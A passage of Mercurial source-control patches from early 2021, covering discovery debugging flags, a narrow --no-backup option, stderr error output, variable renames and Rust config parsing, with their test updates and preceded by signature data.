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 diff --git a/.hgtags b/.hgtags --- a/.hgtags +++ b/.hgtags @@ -219,3 +219,4 @@ 18c17d63fdabd009e70bf994e5efb7db422f4f7f 5.6 1d5189a57405ceca5aa244052c9f948977f4699b 5.6.1 9da65e3cf3706ff41e08b311381c588440c27baf 5.7rc0 +0e2e7300f4302b02412b0b734717697049494c4c 5.7 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611930187 -3600 # Fri Jan 29 15:23:07 2021 +0100 # Node ID 4f5e9a77ff7ab343d030f27ab92e334e8d9882d7 # Parent d6e73351533b427d68a2bb0e165b60a3218210c4 debugdiscovery: add flags to run discovery on subsets of the local repo Generating new repository using strip of local clone is very expensive for large repositories. And such large repository are the most likely to requires debugging around discovery. So we add a simple way to run discovery using provided sets of heads. Differential Revision: https://phab.mercurial-scm.org/D9945 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -69,6 +69,7 @@ pycompat, registrar, repair, + repoview, revlog, revset, revsetlang, @@ -964,20 +965,73 @@ ), (b'', b'rev', [], b'restrict discovery to this set of revs'), (b'', b'seed', b'12323', b'specify the random seed use for discovery'), + ( + b'', + b'local-as-revs', + "", + 'treat local has having these revisions only', + ), + ( + b'', + b'remote-as-revs', + "", + 'use local as remote, with only these these revisions', + ), ] + cmdutil.remoteopts, _(b'[--rev REV] [OTHER]'), ) def debugdiscovery(ui, repo, remoteurl=b"default", **opts): - """runs the changeset discovery protocol in isolation""" + """runs the changeset discovery protocol in isolation + + The local peer can be "replaced" by a subset of the local repository by + using the `--local-as-revs` flag. Int he same way, usual `remote` peer can + be "replaced" by a subset of the local repository using the + `--local-as-revs` flag. This is useful to efficiently debug pathological + discovery situation. + """ opts = pycompat.byteskwargs(opts) - remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) - remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + unfi = repo.unfiltered() + + # setup potential extra filtering + local_revs = opts[b"local_as_revs"] + remote_revs = opts[b"remote_as_revs"] # make sure tests are repeatable random.seed(int(opts[b'seed'])) + if not remote_revs: + + remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) + remote = hg.peer(repo, opts, remoteurl) + ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + else: + branches = (None, []) + remote_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % remote_revs] + ) + remote_filtered_revs = frozenset(remote_filtered_revs) + + def remote_func(x): + return remote_filtered_revs + + repoview.filtertable[b'debug-discovery-remote-filter'] = remote_func + + remote = repo.peer() + remote._repo = remote._repo.filtered(b'debug-discovery-remote-filter') + + if local_revs: + local_filtered_revs = scmutil.revrange( + unfi, [b"not (::(%s))" % local_revs] + ) + local_filtered_revs = frozenset(local_filtered_revs) + + def local_func(x): + return local_filtered_revs + + repoview.filtertable[b'debug-discovery-local-filter'] = local_func + repo = repo.filtered(b'debug-discovery-local-filter') + data = {} if opts.get(b'old'): diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -283,7 +283,7 @@ debugdate: extended debugdeltachain: changelog, manifest, dir, template debugdirstate: nodates, dates, datesort - debugdiscovery: old, nonheads, rev, seed, ssh, remotecmd, insecure + debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure debugdownload: output debugextensions: template debugfileset: rev, all-files, show-matcher, show-stage diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1588,3 +1588,139 @@ common: 0 missing: 1 common heads: 66f7d451a68b + + $ cd .. + + +Test debuging discovery using different subset of the same repository +===================================================================== + +remote is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + all remote heads known locally + elapsed time: * seconds (glob) + round-trips: 1 + heads summary: + total common heads: 25 + also local heads: 25 + also remote heads: 25 + both: 25 + local heads: 260 + common: 25 + missing: 235 + remote heads: 25 + common: 25 + unknown: 0 + local changesets: 1340 + common: 400 + heads: 25 + roots: 1 + missing: 940 + heads: 235 + roots: 235 + first undecided set: 940 + heads: 235 + roots: 235 + common: 0 + missing: 940 + common heads: 0dfd965d91c6 0fe09b60448d 14a17233ce9d 175c0a3072cf 1c51e2c80832 1e51600e0698 24eb5f9bdbab 25ce09526613 36bd00abde57 426989fdefa0 596d87362679 5dd1039ea5c0 5ef24f022278 5f230dc19419 80b39998accb 88f40688ffb5 9e37ddf8c632 abf4d55b075e b2ce801fddfe b368b6ac3ce3 c959bf2e869c c9fba6ba4e2e d783207cf649 d9a51e256f21 e3717a4e3753 + +local is a local subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery b \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + comparing with b + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 1 + common: 0 + unknown: 1 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a + +both local and remove are subset +------------------------ + +remote will be last 25 heads of the local graph + + $ cd $TESTTMP/manyheads + $ hg -R a debugdiscovery \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries in *s (glob) + elapsed time: * seconds (glob) + round-trips: 3 + heads summary: + total common heads: 1 + also local heads: 0 + also remote heads: 0 + both: 0 + local heads: 25 + common: 0 + missing: 25 + remote heads: 25 + common: 0 + unknown: 25 + local changesets: 400 + common: 300 + heads: 1 + roots: 1 + missing: 100 + heads: 25 + roots: 25 + first undecided set: 400 + heads: 25 + roots: 1 + common: 300 + missing: 100 + common heads: 3ee37d65064a # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612389358 28800 # Wed Feb 03 13:55:58 2021 -0800 # Node ID 3c360ab2688dd4e4d4b74a8118bffa4453049757 # Parent 4f5e9a77ff7ab343d030f27ab92e334e8d9882d7 narrow: add --no-backup option for narrowing Most of our users at Google use Mercurial on a file system that keeps backups of previous versions of all files, including those in `.hg/`. They therefore don't need a separate backup in the file system when narrowing their repo (which they typically do by running `hg tracked --auto-remove-includes`). Backups can be very slow. `hg strip` already has a `--no-backup` option. This patch adds the same option to `hg tracked --removeinclude/--addexclude`. Differential Revision: https://phab.mercurial-scm.org/D9951 diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -214,6 +214,7 @@ newincludes, newexcludes, force, + backup, ): oldmatch = narrowspec.match(repo.root, oldincludes, oldexcludes) newmatch = narrowspec.match(repo.root, newincludes, newexcludes) @@ -272,7 +273,7 @@ hg.clean(repo, urev) overrides = {(b'devel', b'strip-obsmarkers'): False} with ui.configoverride(overrides, b'narrow'): - repair.strip(ui, unfi, tostrip, topic=b'narrow') + repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup) todelete = [] for f, f2, size in repo.store.datafiles(): @@ -442,6 +443,12 @@ ), ( b'', + b'backup', + True, + _(b'back up local changes when narrowing'), + ), + ( + b'', b'update-working-copy', False, _(b'update working copy when the store has changed'), @@ -639,6 +646,7 @@ newincludes, newexcludes, opts[b'force_delete_local_changes'], + opts[b'backup'], ) # _narrow() updated the narrowspec and _widen() below needs to # use the updated values as its base (otherwise removed includes diff --git a/tests/test-narrow-trackedcmd.t b/tests/test-narrow-trackedcmd.t --- a/tests/test-narrow-trackedcmd.t +++ b/tests/test-narrow-trackedcmd.t @@ -110,6 +110,8 @@ --clear whether to replace the existing narrowspec --force-delete-local-changes forces deletion of local changes when narrowing + --[no-]backup back up local changes when narrowing + (default: on) --update-working-copy update working copy when the store has changed -e --ssh CMD specify ssh command to use diff --git a/tests/test-narrow.t b/tests/test-narrow.t --- a/tests/test-narrow.t +++ b/tests/test-narrow.t @@ -492,3 +492,20 @@ searching for changes looking for unused includes to remove found no unused includes +Test --no-backup + $ hg tracked --addinclude d0 --addinclude d2 -q + $ hg unbundle .hg/strip-backup/*-narrow.hg -q + $ rm .hg/strip-backup/* + $ hg tracked --auto-remove-includes --no-backup + comparing with ssh://user@dummy/master + searching for changes + looking for unused includes to remove + path:d0 + path:d2 + remove these unused includes (yn)? y + looking for local changes to affected paths + deleting data/d0/f.i + deleting data/d2/f.i + deleting meta/d0/00manifest.i (tree !) + deleting meta/d2/00manifest.i (tree !) + $ ls .hg/strip-backup/ # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612423436 28800 # Wed Feb 03 23:23:56 2021 -0800 # Node ID db9e33beb0fbc8a481a90f71dac68705091eaeac # Parent 3c360ab2688dd4e4d4b74a8118bffa4453049757 bundle2: print "error:abort" message to stderr instead of stdout It seems like the server's message is something you'd like to see even with `--quiet`. It's clearly part of the error. Differential Revision: https://phab.mercurial-scm.org/D9954 diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1135,9 +1135,9 @@ except error.BundleValueError as exc: raise error.Abort(_(b'missing support for %s') % exc) except bundle2.AbortFromPart as exc: - pushop.ui.status(_(b'remote: %s\n') % exc) + pushop.ui.error(_(b'remote: %s\n') % exc) if exc.hint is not None: - pushop.ui.status(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) + pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) raise error.Abort(_(b'push failed on remote')) except error.PushkeyFailed as exc: partid = int(exc.partid) @@ -1832,7 +1832,7 @@ op.modes[b'bookmarks'] = b'records' bundle2.processbundle(pullop.repo, bundle, op=op) except bundle2.AbortFromPart as exc: - pullop.repo.ui.status(_(b'remote: abort: %s\n') % exc) + pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc) raise error.Abort(_(b'pull failed on remote'), hint=exc.hint) except error.BundleValueError as exc: raise error.Abort(_(b'missing support for %s') % exc) diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -147,6 +147,7 @@ $ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0 $ cd narrow2 $ hg pull -q -r 1 + remote: abort: unexpected error: unable to resolve parent while packing b'00manifest.i' 1 for changeset 0 transaction abort! rollback completed abort: pull failed on remote diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -91,7 +91,6 @@ # flakiness here $ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null streaming all changes - remote: abort: Cannot clone from a shallow repo to a full repo. [255] # getbundle full clone diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -85,9 +85,9 @@ $ TEMP_STDERR=full-clone-from-shallow.stderr.tmp $ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR streaming all changes - remote: abort: Cannot clone from a shallow repo to a full repo. [255] $ cat $TEMP_STDERR + remote: abort: Cannot clone from a shallow repo to a full repo. abort: pull failed on remote $ rm $TEMP_STDERR # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1612245745 -3600 # Tue Feb 02 07:02:25 2021 +0100 # Node ID c2435280ca63e135d753c82e184b4507317b4883 # Parent db9e33beb0fbc8a481a90f71dac68705091eaeac copy-tracing: add a --compute flag to debugchangedfiles This will help analysis of possible misbehaving cases. Differential Revision: https://phab.mercurial-scm.org/D9946 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -484,14 +484,31 @@ ui.write(b' %s\n' % v) -@command(b'debugchangedfiles', [], b'REV') -def debugchangedfiles(ui, repo, rev): +@command( + b'debugchangedfiles', + [ + ( + b'', + b'compute', + False, + b"compute information instead of reading it from storage", + ), + ], + b'REV', +) +def debugchangedfiles(ui, repo, rev, **opts): """list the stored files changes for a revision""" ctx = scmutil.revsingle(repo, rev, None) - sd = repo.changelog.sidedata(ctx.rev()) - files_block = sd.get(sidedata.SD_FILES) - if files_block is not None: - files = metadata.decode_files_sidedata(sd) + files = None + + if opts['compute']: + files = metadata.compute_all_files_changes(ctx) + else: + sd = repo.changelog.sidedata(ctx.rev()) + files_block = sd.get(sidedata.SD_FILES) + if files_block is not None: + files = metadata.decode_files_sidedata(sd) + if files is not None: for f in sorted(files.touched): if f in files.added: action = b"added" diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -272,7 +272,7 @@ debugbuilddag: mergeable-file, overwritten-file, new-file debugbundle: all, part-type, spec debugcapabilities: - debugchangedfiles: + debugchangedfiles: compute debugcheckstate: debugcolor: style debugcommands: diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -721,6 +721,11 @@ #if no-compatibility no-filelog no-changeset + $ hg debugchangedfiles --compute 0 + added : a, ; + added : b, ; + added : h, ; + $ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do > echo "##### revision $rev #####" > hg debugsidedata -c -v -- $rev # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612892259 28800 # Tue Feb 09 09:37:39 2021 -0800 # Node ID 05dd091dfa6a76314dd7b1fae61378984c982127 # Parent c2435280ca63e135d753c82e184b4507317b4883 wireprotopeer: clarify some variable names now that we allow snake_case "encargsorres" is hard to parse ("encarg sorres" sounds like it might be Spanish to me, and indeed Google Translate tells me that it's Catalan for "order sands"). Let's clarify with some added underscores and longer names. Differential Revision: https://phab.mercurial-scm.org/D9973 diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -171,9 +171,9 @@ # Send arguments via HTTP headers. if headersize > 0: # The headers can typically carry more data than the URL. - encargs = urlreq.urlencode(sorted(args.items())) + encoded_args = urlreq.urlencode(sorted(args.items())) for header, value in encodevalueinheaders( - encargs, b'X-HgArg', headersize + encoded_args, b'X-HgArg', headersize ): headers[header] = value # Send arguments via query string (Mercurial <1.9). diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -43,14 +43,14 @@ @batchable def sample(self, one, two=None): # Build list of encoded arguments suitable for your wire protocol: - encargs = [('one', encode(one),), ('two', encode(two),)] + encoded_args = [('one', encode(one),), ('two', encode(two),)] # Create future for injection of encoded result: - encresref = future() + encoded_res_future = future() # Return encoded arguments and future: - yield encargs, encresref + yield encoded_args, encoded_res_future # Assuming the future to be filled with the result from the batched # request now. Decode it: - yield decode(encresref.value) + yield decode(encoded_res_future.value) The decorator returns a function which wraps this coroutine as a plain method, but adds the original method as an attribute called "batchable", @@ -60,12 +60,12 @@ def plain(*args, **opts): batchable = f(*args, **opts) - encargsorres, encresref = next(batchable) - if not encresref: - return encargsorres # a local result in this case + encoded_args_or_res, encoded_res_future = next(batchable) + if not encoded_res_future: + return encoded_args_or_res # a local result in this case self = args[0] cmd = pycompat.bytesurl(f.__name__) # ensure cmd is ascii bytestr - encresref.set(self._submitone(cmd, encargsorres)) + encoded_res_future.set(self._submitone(cmd, encoded_args_or_res)) return next(batchable) setattr(plain, 'batchable', f) @@ -257,15 +257,15 @@ # Encoded arguments and future holding remote result. try: - encargsorres, fremote = next(batchable) + encoded_args_or_res, fremote = next(batchable) except Exception: pycompat.future_set_exception_info(f, sys.exc_info()[1:]) return if not fremote: - f.set_result(encargsorres) + f.set_result(encoded_args_or_res) else: - requests.append((command, encargsorres)) + requests.append((command, encoded_args_or_res)) states.append((command, f, batchable, fremote)) if not requests: diff --git a/tests/test-batching.py b/tests/test-batching.py --- a/tests/test-batching.py +++ b/tests/test-batching.py @@ -204,7 +204,7 @@ @wireprotov1peer.batchable def foo(self, one, two=None): - encargs = [ + encoded_args = [ ( b'one', mangle(one), @@ -214,9 +214,9 @@ mangle(two), ), ] - encresref = wireprotov1peer.future() - yield encargs, encresref - yield unmangle(encresref.value) + encoded_res_future = wireprotov1peer.future() + yield encoded_args, encoded_res_future + yield unmangle(encoded_res_future.value) @wireprotov1peer.batchable def bar(self, b, a): # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612178753 -3600 # Mon Feb 01 12:25:53 2021 +0100 # Node ID 0d734c0ae1cfa50de9e9b79aaaaf3089d8d37f78 # Parent 05dd091dfa6a76314dd7b1fae61378984c982127 rust: replace read_whole_file with std::fs::read It does the same thing Differential Revision: https://phab.mercurial-scm.org/D9959 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -14,7 +14,6 @@ use std::path::PathBuf; use crate::repo::Repo; -use crate::utils::files::read_whole_file; /// Holds the config values for the current repository /// TODO update this docstring once we support more sources @@ -64,7 +63,7 @@ ConfigSource::AbsPath(c) => { // TODO check if it should be trusted // mercurial/ui.py:427 - let data = match read_whole_file(&c) { + let data = match std::fs::read(&c) { Err(_) => continue, // same as the python code Ok(data) => data, }; diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -8,9 +8,7 @@ // GNU General Public License version 2 or any later version. use crate::errors::{HgError, IoResultExt}; -use crate::utils::files::{ - get_bytes_from_path, get_path_from_bytes, read_whole_file, -}; +use crate::utils::files::{get_bytes_from_path, get_path_from_bytes}; use format_bytes::format_bytes; use lazy_static::lazy_static; use regex::bytes::Regex; @@ -244,10 +242,10 @@ new_src: &Path, ) -> (PathBuf, io::Result<Vec<u8>>) { if new_src.is_absolute() { - (new_src.to_path_buf(), read_whole_file(&new_src)) + (new_src.to_path_buf(), std::fs::read(&new_src)) } else { let dir = old_src.parent().unwrap(); let new_src = dir.join(&new_src); - (new_src.to_owned(), read_whole_file(&new_src)) + (new_src.to_owned(), std::fs::read(&new_src)) } } diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -18,7 +18,6 @@ use same_file::is_same_file; use std::borrow::{Cow, ToOwned}; use std::fs::Metadata; -use std::io::Read; use std::iter::FusedIterator; use std::ops::Deref; use std::path::{Path, PathBuf}; @@ -309,17 +308,6 @@ } } -/// Reads a file in one big chunk instead of doing multiple reads -pub fn read_whole_file(filepath: &Path) -> std::io::Result<Vec<u8>> { - let mut file = std::fs::File::open(filepath)?; - let size = file.metadata()?.len(); - - let mut res = vec![0; size as usize]; - file.read_exact(&mut res)?; - - Ok(res) -} - #[cfg(test)] mod tests { use super::*; # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612182720 -3600 # Mon Feb 01 13:32:00 2021 +0100 # Node ID 39128182f04e6ddf2918efae55da133e4592de23 # Parent 0d734c0ae1cfa50de9e9b79aaaaf3089d8d37f78 rust: Remove unnecessary check for absolute path before joining `Path::join` does the right thing if its argument is absolute. Differential Revision: https://phab.mercurial-scm.org/D9960 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -13,7 +13,6 @@ use lazy_static::lazy_static; use regex::bytes::Regex; use std::collections::HashMap; -use std::io; use std::path::{Path, PathBuf}; lazy_static! { @@ -97,12 +96,16 @@ while let Some((index, bytes)) = lines_iter.next() { if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; - let filename_to_include = get_path_from_bytes(&filename_bytes); - let (include_src, result) = - read_include(&src, &filename_to_include); - let data = result.for_file(filename_to_include)?; + // `Path::parent` only fails for the root directory, + // which `src` can’t be since we’ve managed to open it as a file. + let dir = src + .parent() + .expect("Path::parent fail on a file we’ve read"); + // `Path::join` with an absolute argument correctly ignores the base path + let filename = dir.join(&get_path_from_bytes(&filename_bytes)); + let data = std::fs::read(&filename).for_file(&filename)?; layers.push(current_layer); - layers.extend(Self::parse(&include_src, &data)?); + layers.extend(Self::parse(&filename, &data)?); current_layer = Self::new(ConfigOrigin::File(src.to_owned())); } else if let Some(_) = EMPTY_RE.captures(&bytes) { } else if let Some(m) = SECTION_RE.captures(&bytes) { @@ -234,18 +237,3 @@ fn make_regex(pattern: &'static str) -> Regex { Regex::new(pattern).expect("expected a valid regex") } - -/// Includes are relative to the file they're defined in, unless they're -/// absolute. -fn read_include( - old_src: &Path, - new_src: &Path, -) -> (PathBuf, io::Result<Vec<u8>>) { - if new_src.is_absolute() { - (new_src.to_path_buf(), std::fs::read(&new_src)) - } else { - let dir = old_src.parent().unwrap(); - let new_src = dir.join(&new_src); - (new_src.to_owned(), std::fs::read(&new_src)) - } -} # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612440981 -3600 # Thu Feb 04 13:16:21 2021 +0100 # Node ID 2845892dd48903f1928ba19aa0da67fb4682851e # Parent 39128182f04e6ddf2918efae55da133e4592de23 rust: Parse system and user configuration CLI `--config` argument parsing is still missing, as is per-repo config Differential Revision: https://phab.mercurial-scm.org/D9961 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -306,6 +306,7 @@ "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", + "home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", @@ -337,6 +338,14 @@ ] [[package]] +name = "home" +version = "0.5.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +dependencies = [ + "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", +] + +[[package]] name = "humantime" version = "1.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -963,6 +972,7 @@ "checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" "checksum glob 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" "checksum 